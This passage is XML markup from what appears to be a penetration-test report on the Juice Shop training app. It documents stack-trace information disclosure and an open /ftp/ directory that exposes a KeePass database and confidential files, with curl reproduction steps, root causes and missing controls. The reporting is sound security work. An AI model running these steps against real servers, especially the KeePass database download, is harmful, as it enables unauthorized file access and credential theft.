          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When errors occur, the application returns HTML error pages containing full stack traces, file system paths, and framework versions. This verbose error handling exposes sensitive implementation details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Information Disclosure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Server file paths revealed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/angular.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/verify.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/fileServer.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Framework version exposed: Express ^4.21.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Middleware stack disclosed including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">morgan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">logger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Internal routing structure visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Reveals server-side file structure for path traversal attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Exposes framework versions for targeted CVE exploitation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Reveals middleware and security controls in place</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Provides attackers with detailed system architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Access non-existent endpoint to trigger error:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://juiceshop:3000/api/nonexistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Observe 500 error response with full stack trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Note exposed paths like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/angular.js:42:18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Access restricted file to see another stack trace:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://juiceshop:3000/ftp/package.json.bak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Stack trace reveals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/fileServer.js:59:18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Revealed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Application deployed at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Build directory structure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Express.js version 4.21.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Morgan logging middleware in use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Internal verification routes at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/juice-shop/build/routes/verify.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The application runs with verbose error handling enabled in production, displaying detailed stack traces instead of generic error messages. The Node.js/Express application should use production error handlers that sanitize output.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0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error page revealing Express version 4.21.0 and internal file paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Error page revealing Express version 4.21.0 and internal file paths" title="" id="67" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-f1d5a2c5-eea8-4320-9642-c41e1bcf2c72-5-misconfig-stack-trace-disclosure.png" id="68" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>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Error page revealing Express version 4.21.0 and internal file paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full HTML error response with complete stack trace showing server paths:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-f1d5a2c5-eea8-4320-9642-c41e1bcf2c72-6-misconfig-stack-trace.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="80" w:name="finding-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="79" w:name="X6f2c1061e1a22a1cd87d38c31195a9edc9bad69"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Directory Listing and Sensitive File Exposure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58">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http://juiceshop:3000/ftp/, http://juiceshop:3000/ftp/acquisitions.md, http://juiceshop:3000/ftp/incident-support.kdbx</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w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/ftp/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">endpoint has directory listing enabled and exposes sensitive files including confidential business documents, backup files, and a KeePass password database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The FTP directory is publicly accessible with directory listing enabled, allowing attackers to browse, enumerate, and download sensitive files without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Exposed Files:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">acquisitions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Confidential business acquisition plans marked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do not distribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">incident-support.kdbx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- KeePass password database (3246 bytes, downloadable)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">coupons_2013.md.bak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Backup of coupon codes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json.bak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Application dependency backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package-lock.json.bak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Lock file backup (750KB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">announcement_encrypted.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Large encrypted file (369KB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">suspicious_errors.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Error log file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eastere.gg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Easter egg file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypt.pyc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Compiled Python encryption module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">legal.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Legal documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">KeePass database may contain credentials for internal systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">High:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Confidential acquisition plans disclose business strategy and stock impact information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Medium:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Backup files may contain outdated but sensitive dependency information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Medium:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">File enumeration aids reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://juiceshop:3000/ftp/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Observe directory listing showing all files with sizes and dates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Download confidential document:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://juiceshop:3000/ftp/acquisitions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Note document contains:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This document is confidential! do not distribute!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and stock market impact statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Download KeePass database:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o incident-support.kdbx http://juiceshop:3000/ftp/incident-support.kdbx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6. Verify file size: 3246 bytes of password database data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence of Sensitive Content:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">acquisitions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file explicitly states:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This document is confidential! Do not distribute!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Our company plans to acquire several competitors within the next year.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This will have a significant stock market impact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Directory listing is enabled on the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/ftp/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Sensitive files are stored in a publicly accessible directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. No authentication or access controls protect these files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. robots.txt actually advertises the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path to attackers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Security Controls:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Directory indexing should be disabled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sensitive files should not be in web-accessible directories</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Access controls should restrict file downloads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- File extension filtering is incomplete (blocks .bak but not .kdbx)</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2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FTP directory listing showing all exposed files including backups and KeePass database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="FTP directory listing showing all exposed files including backups and KeePass database" title="" id="73" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-3fdd0e16-0e1c-44a1-bd08-f50a108aad5b-7-misconfig-ftp-directory-listing.png" id="74" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>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FTP directory listing showing all exposed files including backups and KeePass database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confidential acquisitions.md file with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do not distribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">warning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Confidential acquisitions.md file with ‘do not distribute’ warning" title="" id="76" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-3fdd0e16-0e1c-44a1-bd08-f50a108aad5b-8-misconfig-sensitive-file-acquisitions.png" id="77" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>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Confidential acquisitions.md file with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
